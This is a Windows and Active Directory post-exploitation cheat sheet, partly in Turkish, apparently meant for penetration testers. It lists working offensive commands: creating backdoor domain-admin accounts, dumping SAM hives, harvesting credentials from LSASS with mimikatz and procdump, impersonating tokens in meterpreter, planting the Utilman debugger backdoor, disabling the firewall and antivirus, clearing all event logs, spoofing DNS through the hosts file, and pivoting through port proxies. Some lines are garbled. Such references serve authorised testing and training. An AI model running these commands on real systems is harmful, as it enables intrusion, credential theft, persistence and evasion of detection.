mingw3
=========

For 64-bit use: x86_64-w64-mingw32-gc++

For 32-bit use: i686-w64-mingw32-g++  => i686-w64-mingw32-gcc 25912.c -o exploit.exe -lws2_32



Operating System               Version Number
===============================================

Windows 1.0                    1.04
Windows 2.0                    2.11
Windows 3.0                    3
Windows NT 3.1                 3.10.528
Windows for Workgroups 3.11    3.11
Windows NT Workstation 3.5     3.5.807
Windows NT Workstation 3.51    3.51.1057
Windows 95                     4.0.950
Windows NT Workstation 4.0     4.0.1381
Windows 98                     4.1.1998
Windows 98 Second Edition      4.1.2222
Windows Me                     4.90.3000
Windows 2000 Professional      5.0.2195
Windows XP                     5.1.2600
Windows Vista                  6.0.6000
Windows 7                      6.1.7600
Windows 8.1                    6.3.9600
Windows 10                     10.0.10240

RunAs Windows Command Line
===========================

runas /netonly /user:DOMAIN-ADI\USER-ADI cmd

GELEN EKRAN => dir \\X.X.X.X\Users
 
 
 Add Localuser on Windows
 ========================
 
 net user /add [username] [password]
 
 new localgroup administrators [username] /add
 
 net localgroup "Remote Desktop Users" /add [username]
 
 net localgroup "Remote Desktop Users"

Windows
=======

systeminfo | find "System Boot Time:"

reg.exe save HKLM\SAM MySam
reg.exe save HKLM\SYSTEM MySys

# Anonymous users can obtain the Windows password policy

msf > use auxiliary/scanner/smb/smb_enumusers 
------------------------------------------------------------------------------------------------------

# CIFS NULL Session Permitted

enum4linux -a <target IP>

rpcclient -U "" <target IP>
Enter  's password: <return>
rpcclient $> 
  srvinfo
  enumdomusers
  queryuser <user>
  netshareenum
  netshareenumall
  querydominfo
  getdompwinfo

net use \\target IP\ipc$ "" /u:""            # Windows
------------------------------------------------------------------------------------------------------

# CIFS Share Writeable By Everyone

Places > Network > Browse Network

------------------------------------------------------------------------------------------------------

# Connect anonymously

smbclient -N -L <target IP>

# Connect with credentials

smbclient -W domain -U user -L <target IP>
proxychains smbclient '//10.0.0.10/c$' -U 'domain.local/username%password'
------------------------------------------------------------------------------------------------------

# NetBIOS and SMB

nmap -Pn -n -T4 -p139,445 --script=smb-check-vulns --script-args=unsafe=1 <target range>

enum -G <target IP>                          # Windows
enum -P <target IP>

nbtenum -r <target IP>                       # Windows
nbtenum -q <target IP>

nbtscan -r <target range>
nbtscan -f hosts.txt
------------------------------------------------------------------------------------------------------

# Show domain users and group information

DumpSec
------------------------------------------------------------------------------------------------------

# Show members of domain groups

global.exe "domain admins" \\dc-controller
------------------------------------------------------------------------------------------------------

# Search all folders for filenames that include 'password'.

dir /s /p *password*.*                       # Windows
------------------------------------------------------------------------------------------------------
# Get System Information
 
system info | finest /B OS
 
# net commands

net accounts                                 # Local password policies.
net accounts /domain
net config workstation
net localgroup                               # Local Security Groups.
net localgroup /domain                       # Domain Security Groups.
net localgroup Administrators                # Users in the local Administrators Security Group.
net localgroup Administrators /domain        # Users in the domain Administrators Security Group.
net share
net user                                     # Local users.
net user /domain > users.txt                 # All users in the current user's domain (take a few to run).
net user hacker /domain                      # Info on domain user.
net view                                     # Computers in the users domain and other domains.
net view /domain                             # Computers in other domain.

net user hacker password /add
net localgroup administrators /add hacker
------------------------------------------------------------------------------------------------------

# Domain accounts

net group “Domain Admins" /domain > domain-admin.txt
net group “Domain Users" /domain > domain-users.txt

net user hacker password /add /domain
net group "Enterprise Admins" hacker /add /domain
net groups "Enterprise Admins" /domain
------------------------------------------------------------------------------------------------------

# Domain control

nbtstat -a <target IP>

The netbios hex code “1C” next to the domain name signifies that the system being polled is a domain 
controller for the domain name listed on the left. If the “1C” would have been next to an Inet service
it would have signified it was an IIS server.

Note the differences between the U and the G. U = UNIQUE and G = GROUP. When you see a hex code next 
to UNIQUE it is usually associated with the computer itself. With GROUP it is associated with the 
workgroup or domain: https://support.microsoft.com/en-us/kb/163409
------------------------------------------------------------------------------------------------------

# Enumeration
 
arp -a
ipconfig /all
ipconfig /displaydns
netstat -ano
netstat -ano | findstr LISTENING
netstat -c
netstat -ns
netstat -vb
route print

date /t & time /t
doskey /history
gpresult /COMPUTERNAME
gpresult /%username%
gpresult /z
nbtstat -A <target IP>
nbtstat -a <name of target>
net group
net group administrators
net session
net start
set
tasklist /m
tasklist /svc
tasklist /v

dir c:\*.xls /s                         # Show all Excel docs.
dir c:\*.xlsx /s                        # Show all Excel docs.
dir c:\*.ppt /s                         # Show all PowerPoint docs.
dir c:\*.pptx /s                        # Show all PowerPoint docs.
dir c:\*.doc /s                         # Show all Word docs.
dir c:\*.docx /s                        # Show all Word docs.
dir c:\*.pdf /s                         # Show all PDFs.
dir C:\* /a/s/b > dosyalar.txt          # Tüm Klasörleri dosyalar.txt içerisine yazar
------------------------------------------------------------------------------------------------------

# Firewall

netsh firewall show config
netsh firewall add portopening TCP 8081 ePO
netsh firewall set opmode disable            # Disable firewall.

firewall show state
netsh firewall set opmode disable

netsh wlan show interfaces
netsh wlan show drivers
netsh wlan show networks
netsh wlan show profiles
netsh wlan show profiles name="name"
show profiles name="name" key=clear
------------------------------------------------------------------------------------------------------

# Local DNS spoofing

echo <attacker IP> facebook >> %WINDIR%\System32\drivers\etc\hosts
type %WINDIR%\System32\drivers\etc\hosts
------------------------------------------------------------------------------------------------------

# Misc

cd \WINDOWS\system32\
type %SYSTEMDRIVE%\boot.ini
type %WINDIR%\win.ini
fsutil fsinfo drives

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

netsh rdesktop <target-IP>
------------------------------------------------------------------------------------------------------

HKLM
File > Load Hive
Just give it a name.
/Microsoft Windows/Current Version/Run
Add your back doored file.
------------------------------------------------------------------------------------------------------

Show domain admin		net group "Domain Admins" /domain
Dump the local hashes		msf > run post/windows/gather/smart_hashdump
Show the admin			msf > use auxiliary/scanner/smb/smb_enumusers_domain
Compromise an Admin's box
Assume token			meterpreter > load incognito
				meterpreter > list_tokens -u
				meterpreter > impersonate_token domain\\adaministrator
				meterpreter > getuid
Drop to a Windows shell		meterpreter > shell
				C:\> whoami
Add user to the domain		C:\> net user hacker /add /domain
Add user to security group	C:\> net group "Domain Admins" hacker /add /domain

==========================================

Kullanıcı ve Grup İşlemleri >Yerel bilgisayarda kullanıcı işlemleri

	* whoami
	* echo %username%
	* echo %computername%%username%
	* whoami /all
	* net user
	* net user Ali
	* net user Ali /Active:Yes
	* net user Ali Aa123456
	* net user Ali /del
	* net user Burak Bb123456 /add

 
Yerel bilgisayarda grup işlemleri

	* net localgroup
	* net localgroup “Remote Desktop Users”
	* net localgroup “Sistem Yoneticileri” /add
	* net localgroup “Sistem Yoneticileri” /del
	* net localgroup Administrators Burak /add
	* net localgroup Users Burak /del

 
Etki alanındaki kullanıcı işlemleri

	* net user /domain
	* net user Cihan.Ozgullu /domain
	* net user Cihan.Ozgullu /Active:Yes /domain
	* net user Cihan.Ozgullu Cc123456 /domain
	* net user Cihan.Ozgullu /del /domain
	* net user Deniz.Kirmizili Dd123456 /add /domain

 
Etki alanındaki grup işlemleri

	* net group /domain
	* dsquery group -limit 0 | dsget group -members –expand
	* net group “Domain Computers” /domain
	* net group “Yardim Masasi” /add /domain
	* net group “Yardim Masasi” /del /domain
	* net group “Domain Admins” Cihan.Ozgullu /add /domain
	* net group “Domain Users” Deniz.Kirmizili /del /domain
	* for /f “delims=” %X in (DomainAdminsGrubuUyeleri_Listesi.txt) do net user %X /domain >> DomainAdminsGrubuUyelerininIlkeBilgileri.txt

Not: Girdi dosyasında (DomainAdminsGrubuUyeleri_Listesi.txt), kullanıcı isimleri alt alta yazılıdır.
Bilgisayar İşlemleri >Mevcut sistem bilgileri

	* systeminfo
	* ver
	* echo %LOGONSERVER%
	* systeminfo | findstr “Domain:”
	* fsutil fsinfo drives
	* net view
	* net config WORKSTATION
	* getmac

 
Başlangıç dizinleri

	* Windows 6.0 ve 6.1
	* 
		* Tüm kullanıcılar için: %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
		* Belirli kullanıcılar için: %SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

	* Windows NT 5.0, 5.1 ve 5.2
	* 
		* %SystemDrive%\Documents and Settings\ All Users\ Start Menu\Programs\Startup


 
Hesap politikası işlemleri

	* net accounts
	* net accounts /MAXPWAGE:3

 
Denetim politikası işlemleri

	* auditpol /get /category:*
	* auditpol /set /subcategory:”IPsec Driver” /success:enable /failure:disable

 
Paylaşım işlemleri

	* net share
	* net share YeniPaylasim=C:UsersDeneme /GRANT:Everyone,Full

 
Oturum bilgileri

	* query session
	* qwinsta
	* psloggedon -l Ertan
	* Get-WmiObject -Class Win32_NetworkLoginProfile | Sort-Object -Property LastLogon -Descending | Select-Object -Property * -First 1 | Where-Object {$_.LastLogon -match “(d{14})”} | Foreach-Object { New-Object PSObject -Property @{ Name=$_.Name;LastLogon=[datetime]::ParseExact($matches[0], “yyyyMMddHHmmss”, $null)}}

 
Proses işlemleri

	* tasklist /v
	* tasklist /SVC | findstr /I “explorer.exe”
	* tasklist /fi “pid eq 460”
	* wmic process where (executablepath like “%system32%” and name!=”svchost.exe” or Priority = “8” ) get HandleCount, Name, ParentProcessId, Priority, ProcessId, ThreadCount /Every:3 > CalisanProseslerinDetaylari.txt
	* taskkill /F /T /IM filezillaftp.exe
	* taskkill /PID 1862 /F
	* qprocess explorer.exe
	* qprocess akif.cihangir
	* wmic process call create calc
	* wmic process where name=”calc.exe” call terminate

 
Kayıt değeri işlemleri

	* reg query HKLM\System\CurrentControlSet\Control\Lsa /v crashonauditfail
	* reg query “HKCU\Software\SimonTatham\PuTTY\Sessions\PuttyUzerindeKayitliOturumAdi” /v Hostname
	* reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 1 /f
	* reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 12345 /f
	* reg save HKLM\SAM C:\SAMDosyasi
	* reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe” /v Debugger /t REG_SZ /d “C:\Windows\System32\cmd.exe” /f
	* reg export “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” Sonuc.reg
	* reg import Sonuc.reg

 
Ağ hareketleri

	* netstat -ano
	* netstat -ano -p TCP | findstr 3389 | findstr /v 0.0.0.0:3389
	* netstat -abf

 
Yönlendirme işlemleri

	* netstat -r
	* route print -4
	* route add 192.168.10.0 MASK 255.255.255.0 192.168.10.1
	* route del 192.168.10.0

 
Kablosuz ağ işlemleri

	* netsh wlan show profiles
	* netsh wlan show profile name=ModemSSID
	* netsh wlan show profile name=ModemSSID key=clear | findstr “Key Content”
	* Dosya dizini: C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\XXX

 
Ağ işlemleri

	* ipconfig /all
	* arp -a
	* nslookup www.hotmail.com 8.8.8.8
	* tftp -I 192.168.64.26 GET Uygulama.exe
	* netsh interface ipv4 set address name=”Local Area Connection” source=static address=10.12.40.110 mask=255.255.255.0 gateway=10.12.40.1
	* netsh interface ipv4 add dnsservers “Local Area Connection” 172.19.35.80
	* netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=4000 connectaddress=2.2.2.2
	* type C:\Windows\System32\Drivers\etc\hosts

 
DNS bilgileri

	* ipconfig /displaydns
	* ipconfig /flushdns

 
Dosya ve klasör işlemleri


findstr /sip root C:\wamp64\www\*.*      ilgili dizin içindeki herşey içinde root kelimesinin geçtiği yeri arar

  /s hedef dizin ve altındaki tüm dizinlerde arama yapmak için kullanılır
  /i ignore case anlamına gelir
  /p sadece yazılabilir karakterler içeren dosyalar içinde arama yapmamızı sağlar


	* dir /a C:\Users\Mehmet\Downloads\*.pdf
	* tree /f /a
	* dir /s /b
	* findstr /si “parola sifre password root admin”
	* icalcs C:\Users\Ahmet\Desktop\KritikKlasor –> icalcs: Sysinternals aracı
	* forfiles /P d: /D -30 /S /M *.exe /C “cmd /c echo @path @ext @fname @fdate”
	* Get-ChildItem -Path C:\Users, C:\Araclar -Include *.txt, *.log, *.bat, *.reg, *.cs, *.sql, *.ps1, *.config, *.properties, *.xml, *.conf -Recurse -ErrorAction SilentlyContinue -Force | Select-String -Pattern Password, password, Şifre, şifre, Parola, parola, Sifre, sifre, root, admin -casesensitive > C:\KritikBilgiler.txt

 
Zamanlanmış görevler

	* schtasks /query /fo LIST /v | findstr “Folder: HostName: Author: Run: TaskName: Comment:”
	* schtasks /Create /SC Daily /TN GunlukKullaniciListesi /TR “C:\Windows\System32\net.exe user”
	* at /interactive 15:00 cmd.exe
	* net time

 
Servis işlemleri

	* sc query state= all
	* sc queryex (PID değeri de içerir)
	* sc qc TermService
	* accesschk -cqwvu TrustedInstaller –> accesschk: Sysinternals aracı
	* wmic service get name, displayname, started, state, AcceptPause, AcceptStop | findstr /C:Term
	* net stop PolicyAgent
	* net start termservice start= auto
	* sc config PlugPlay start= disabled
	* sc create ServisAdi binpath=C:\Users\UygulamaDosyasi.exe start= auto

Not: Power, PlugPlay gibi kapatılamayan servisler devre dış bırakılıp, makine yeniden başlatılırsa bu servis çalışmaz.
 
Güvenlik duvarı işlemleri

	* netsh firewall set service remotedesktop enable
	* netsh firewall show opmode
	* netsh firewall add portopening TCP 12345 “12345 Portunu Acan Kural” Enable All
	* netsh firewall show portopening
	* netsh advfirewall show allprofiles
	* netsh advfirewall set allprofiles state off
	* netsh advfirewall set currentprofile state off
	* netsh firewall set logging droppedpackets = enable
	* netsh firewall set logging connections = enable
	* Logların düştüğü dizin: %systemroot%System32LogFilesFirewallpfirewall.log

 
Programlar ve özellikler

	* wmic product get name
	* wmic product where name=”Kaspersky Internet Security” call uninstall /nointeractive
	* Dism.exe /online /Get-Features /Format:Table
	* Dism.exe /online /Enable-Feature /Featurename:TFTP
	* pkgmgr /iu:”TelnetClient”

 
Başlangıç programları

	* wmic startup get name, user, location

 
Güncelleme işlemleri

	* wusa /uninstall /kb:2744842 /quiet /norestart
	* wmic qfe where HotFixID=”KB3011780″ get Caption, HotFixID

 
Log işlemleri

	* wevtutil qe Application /c:10 /rd:true /f:text
	* for /F “tokens=*” %G in (‘wevtutil.exe el’) DO (wevtutil.exe cl “%G”)

 
Başka bir kullanici gibi komut çalıştırma

	* runas /env /user:SIRKET\Levent.Altayli cmd
	* psexec -s cmd.exe

 
Oturumu kilitleme

	* rundll32.exe user32.dll, LockWorkStation

 
Dosya kopyalama

	* copy D:\netcat.exe C:\Users

 
Parolaları RAM üzerinden elde etme

	* mimikatz > privilege::debug > sekurlsa::logonPasswords
	* mimikatz “sekurlsa::logonPasswords full” exit
	* procdump -accepteula -ma lsass.exe lsass.dmp
	* mimikatz > sekurlsa::minidump lsass.dmp > sekurlsa::logonPasswords
	* wce -w
	* wce -s WORKGROUP:Administrator:<LM>:<NTLM>

 
Grup ilkesi işlemleri

	* gpupdate /force
	* gpresult /z
	* gpresult /H Politika.html
	* gpresult /USER Ferdi.Murathan /SCOPE COMPUTER /Z

 
Posta işlemleri

	* dsquery user -name “user name”|dsget user -samid -email -display
	* Get-Mailbox | fl name, emailaddresses
	* Get-QADUser -SizeLimit 0 -Enabled -Email * | Select-Object DisplayName,Email

 
Etki alanı güven ilişkileri

	* nltest /domain_trusts –> Tüm güven ilişkilerini listeler
	* nltest /dcname:Sirket –> Belli bir etki alanındaki PDC sunucusunu sorgular.
	* ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).Domains –> Forest (Orman) içerisindeki tüm etki alanları listelenir.
	* ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() –> Mevcut etki alanı için tüm güven ilişkileri (Parent-Child, 2 yönlü vs) listelenir.

 
Oturum açan etki alanı hesabının bilgileri

	* Get-EventLog security 4624 -newest 10000 | Where-Object{$_.Message -like ‘*Galip.Tekinli*’}| format-list Message > GalipTekinliHesabininActigiOturumBilgileri.txt

Not: Belirtilen komut etki alanı denetleyicisinde (DC) çalıştırılmalıdır.
 
Diğer komutlar

	* shutdown /r /t 0 /f

 
Uzak Bilgisayar İşlemleri >Uzak bilgisayar için sistem bilgileri

	* psinfo \\172.16.4.230 -h -s -d
	* systeminfo /S 10.35.2.52 /U Ornek\Murat /P Aa123456

 
Uzak bilgisayarın paylaşımına erişim

	* net use K: \\172.24.63.135\C$ /USER:SIRKET\Hakki.Leventli Hh123456
	* net use K: /delete

 
Uzak bilgisayarın komut satırına erişim

	* psexec \\172.16.4.230 -u SIRKETHakki.Leventli -p Hh123456 cmd.exe /accepteula
	* psexec \\172.16.4.230 -u SIRKETHakki.Leventli -p Hh123456 -c -f \\172.29.26.152\Paylasim\Uygulama.exe

 
Uzaktaki bilgisayarda çalışan prosesler

	* tasklist /V /S 172.16.72.129 /U SIRKETVeli.Kut /P 1907?Fenerbahce

 
Uzak bilgisayardaki kayıt değerleri

	* reg query “\\192.168.170.62\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v Userinit

 
Uzak bilgisayarda açık olan oturumlar

	* query session /server:DCSunucusu
	* reset session 3 /server:DCSunucusu

 
Uzak bilgisayarda zamanlanmış görevler

	* net time \\172.31.45.26
	* at \\172.31.45.26 10:32 Betik.bat

 
Uzak bilgisayardaki dizinin kopyalanması

	* xcopy /s 10.46.83.183\PaylasimKlasoru C:\KopyalanacakDizin

 
Diğer komutlar

	* shutdown /m \\172.24.63.168 /r /t 10 /f /c “Bilgisayar 10 saniye icinde kapatiliyor…”
	
========

%SYSTEMDRIVE%\boot.ini	

A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening. WARNING - in more recent versions of Windows this file in no longer there.

%WINDIR%\win.ini	

This is another file that can be counted on to be readable by all users of a system.

%SYSTEMROOT%\repair\SAM

%SYSTEMROOT%\System32\config\RegBack\SAM

Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.

%SYSTEMROOT%\repair\system

%SYSTEMROOT%\System32\config\RegBack\system

This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.

%SYSTEMROOT%\repair\SAM 

%SYSTEMROOT%\System32\config\RegBack\SAM	

These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.

%WINDIR%\repair\sam

%WINDIR%\repair\system

%WINDIR%\repair\software

%WINDIR%\repair\security

System registry hives. https://en.wikipedia.org/wiki/Windows_Registry

%SYSTEMROOT%\repair\SAM

%SYSTEMROOT%\System32\config\SAM

%SYSTEMROOT%\System32\config\RegBack\SAM	

Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.

%SYSTEMROOT%\repair\SYSTEM

%SYSTEMROOT%\System32\config\SYSTEM

%SYSTEMROOT%\System32\config\RegBack\SYSTEM	
This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.

%SYSTEMDRIVE%\autoexec.bat	autoexec.bat is a startup script that executes at startup. As Webopedia states, “Stands for automatically executed batch file, the file that DOS automatically executes when a computer boots up. This is a convenient place to put commands you always want to execute at the beginning of a computing session. For example, you can set system parameters such as the date and time, and install memory-resident programs.”

%SYSTEMDRIVE%\pagefile.sys	This file is used by the operating system when there is not enough RAM (memory) in the system. It is a large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size.

%SystemDrive%\inetpub\logs\LogFiles	IIS 7.x web server log file location.

%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat	Internet Explorer web browser history file (http://support.microsoft.com/kb/322916)

%USERPROFILE%\ntuser.dat	User-level Windows registry settings (http://technet.microsoft.com/en-us/library/cc758618(v=WS.10).aspx)

%WINDIR%\System32\drivers\etc\hosts

System hosts file for local translation of host names to IP addresses.

%WINDIR%\debug\NetSetup.log	Shows issues when computers are joined to a domain. http://technet.microsoft.com/en-us/library/cc961817.aspx

%WINDIR%\iis[version].log where [version] = 6, 7, or 8	Internet Information Service (IIS web server) log files.

%WINDIR%\system32\CCM\logs\*.log	Windows SCCM (System Center Configuration Manager) log files (http://technet.microsoft.com/en-us/library/bb892800.aspx)

%WINDIR%\system32\config\AppEvent.Evt

%WINDIR%\system32\config\SecEvent.Evt	Windows Event Logs.

%WINDIR%\system32\config\default.sav

%WINDIR%\system32\config\security.sav

%WINDIR%\system32\config\software.sav

%WINDIR%\system32\config\system.sav	Backup Windows registry files (http://forensics.wikia.com/wiki/Windows_registry_entries)

%WINDIR%\system32\logfiles\httperr\httperr1.log	IIS 6.x web server error logs.

%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log where YYMMDD = year month day	Web server log files.

unattend.txt, unattend.xml, unattended.xml, sysprep.inf	Used in the automated deployment of Windows images and can contain user accounts. Sometimes found in the %WINDIR%\Panther\ directory.


Pivoting in Windows Using Native Port Forwarding
=================================================

C:\>netsh interface portproxy add v4tov4 listenport=<lport>
listenaddress=<lhost> connectport=<rport> connectaddress=<rhost>

<lport> - local port to listen on
<lhost> - local address to bind to
<rport> - remote port
<rhost> - remote host

netsh interface portproxy add v4tov4 listenport=1194
listenaddress=0.0.0.0 connectport=8080 connectaddress=10.10.10.20

netstat -an
netsh interface portproxy

xfreerdp /d:DOM /u:admin /p:password /v:10.10.10.10:49162

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md
